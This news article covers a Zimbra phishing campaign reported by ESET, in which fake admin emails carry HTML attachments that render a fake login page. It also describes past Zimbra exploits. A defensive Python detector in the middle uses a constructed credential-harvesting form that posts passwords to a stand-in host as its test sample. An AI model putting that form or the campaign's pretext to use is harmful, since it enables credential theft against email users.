A new phishing campaign targeting users of the Zimbra Collaboration email servers has been spotted, and researchers are saying it’s quite successful.
Zimbra Collaboration is an online collaborative suite that comes with an email server and a web client.
According to researchers from ESET, cybercriminals started sending phishing emails to victims at random in April 2023, in an attempt to obtain login credentials for the service.
Fake login page
In these emails, the attackers assume the identity of the victim organization’s administrator, and tell the recipient that their email server is about to be updated. This update will make the email inbox inaccessible, and possibly result in termination.
To make sure that doesn’t happen, the victim is advised to open the HTML file that is attached to the email and review the instructions found there.
The attachment, however, holds no instructions. Instead, it renders a fake Zimbra login page with the username already filled in, where users can type in their passwords. The submitted credentials are then sent to the attacker’s server via an HTTPS POST request.
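A defender-side check for the attachment described above, added here as an illustrative example rather than anything from ESET’s report: it parses an HTML attachment, finds forms that collect a password, and flags any whose action posts to a host other than the organization’s own mail servers (the sample HTML, the host names and the `trusted_hosts` set are constructed for the example).

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample of a credential-harvesting HTML attachment: the login name is
# prefilled and the password field posts to a host the organization does not own.
SAMPLE_ATTACHMENT = """<html><body>
<form method="post" action="https://mail-update.example.net/collect.php">
  <input type="text" name="username" value="victim@corp.example">
  <input type="password" name="password">
  <input type="submit" value="Sign in">
</form></body></html>"""


class FormScanner(HTMLParser):
    """Collect each <form>: its action, whether it has a password field,
    and whether a login-name field was prefilled for the recipient."""

    def __init__(self):
        super().__init__()
        self.forms = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)  # attribute values may be None for bare attributes
        if tag == "form":
            self._current = {"action": a.get("action") or "",
                             "password": False, "prefilled_user": False}
            self.forms.append(self._current)
        elif tag == "input" and self._current is not None:
            kind = (a.get("type") or "text").lower()
            name = (a.get("name") or "").lower()
            if kind == "password":
                self._current["password"] = True
            elif kind in ("text", "email") and a.get("value") and \
                    any(k in name for k in ("user", "mail", "login")):
                self._current["prefilled_user"] = True

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None


def suspicious_forms(html, trusted_hosts):
    """Return password-collecting forms that post anywhere but a trusted host.
    A relative action (no host) is also flagged: a real webmail login page
    would not be delivered as a file attachment in the first place."""
    scanner = FormScanner()
    scanner.feed(html)
    hits = []
    for f in scanner.forms:
        host = urlparse(f["action"]).hostname or ""
        if f["password"] and host not in trusted_hosts:
            hits.append({"action": f["action"], "host": host,
                         "prefilled_user": f["prefilled_user"]})
    return hits
```

A prefilled username together with an external password sink is the combination the campaign relies on, so a hit with `prefilled_user` set deserves a higher severity than a bare password form.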
In some cases, ESET further stated, the attackers would use previously compromised admin accounts to create new accounts on Zimbra servers for phishing email distribution, further adding to the perceived legitimacy of the emails. ESET says the campaign is hardly sophisticated, but its results are “impressive”.
According to BleepingComputer, Zimbra Collaboration email servers are “commonly” targeted by cybercriminals. They use them for cyber espionage, collecting internal company communications. They can also sometimes use them as an initial point of breach, to further move laterally throughout the target network.
One such scenario happened earlier this year, when a Russian threat actor abused a vulnerability in the tool (CVE-2022-27926) to snoop on emails belonging to organizations aligned with the North Atlantic Treaty Organization (NATO). Governments, diplomats, and military personnel were also targeted, the publication said.
Another attack occurred in October 2022, when more than 900 servers were hacked thanks to a Zimbra zero-day. Kaspersky labeled the flaw as a remote code execution vulnerability that allows threat actors to send an email with a malicious file that deploys a webshell in the Zimbra server without triggering an antivirus alarm. It is now tracked as CVE-2022-41352 and some researchers claim as many as 1,600 servers were compromised as a result.